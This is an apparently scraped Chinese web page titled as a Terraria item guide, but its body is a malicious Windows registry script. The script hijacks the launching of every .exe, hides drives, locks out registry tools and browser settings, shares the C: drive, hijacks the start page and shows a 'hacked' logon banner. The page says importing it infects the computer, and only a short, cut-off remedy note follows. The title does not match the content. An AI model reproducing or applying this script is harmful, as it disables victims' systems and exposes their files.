泰拉瑞亚物品图鉴:病毒+防御
来源:百度文库 编辑:偶看新闻 时间:2024/05/10 14:05:38
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
""="c:\\windows\\bd.exe"
[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
""="c:\\windows\\xm.ico"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"NoDrives"=dword:FFFFFFFF
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NotrayContextMenu"=dword:00000001
"NoChangeStartMenu"=dword:00000001
"NoChangeStartMenu"=dword:00000001
"NoStartMenuMFUprogramsli
"NoDesktop"=dword:00000001
"NoDispAppearancePage"=dword:00000001
"NoLogOff"=dword:00000001
"NoRecentDocsMenu"=dword:00000001
"NoSetFolders"=dword:00000001
"NoRun"=dword:00000001
"NoClose"=dword:00000001
"NoViewContextMenu"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\]
""="txtfile"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ScanRegistry"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\Control Panel\Desktop]
"MenuShowDelay"=999
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"LegalNoticeCaption"="你的电脑被飞剑吹雪黑了
"LegalNoticeText"="别人笑我太疯癫,我笑他人看不穿"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem\CDFS]
"Prefetch"=dword:00 00 09 00
"CacheSize"=dword:AC 09 00 00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareServer"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"IPEnableRouter"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSetTaskbar"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"NoSaveSettings"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000001
"NoRealMode"=dword:00000001
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoBrowserContextMenu"=dword:00000001
"NoBrowserOptions"=dword:00000001
"NoBrowserSaveAs"=dword:00000001
"NoFileOpen"=dword:00000001
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Advanced"=dword:00000001
"Cache Internet"=dword:00000001
"AutoConfig"=dword:00000001
"HomePage"=dword:00000001
"History"=dword:00000001
"Connwiz Admin Lock"=dword:00000001
"SecurityTab"=dword:00000001
"ResetWebSettings"=dword:00000001
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000001
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions]
"NoAddingSubScriptions"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFileMenu"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$]
"Flags"=dword:302
"Type"=dword:00000000
"Path"="C:\\"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://blog.sina.com.cn/zhaoqiangpersonal"
"Window Title"="飞剑吹雪欢迎你"
将以上信息保存为reg格式,导入注册表就中病毒了
如果中了病毒怎么办?
1,如果注册表可以导入,即双击.reg格式的文件可以导入到注册表
例如
2,注册表根本就不能导入
下载od
因为一般病毒感染exe,即修改exefile=后的键值
我们打开方式选择od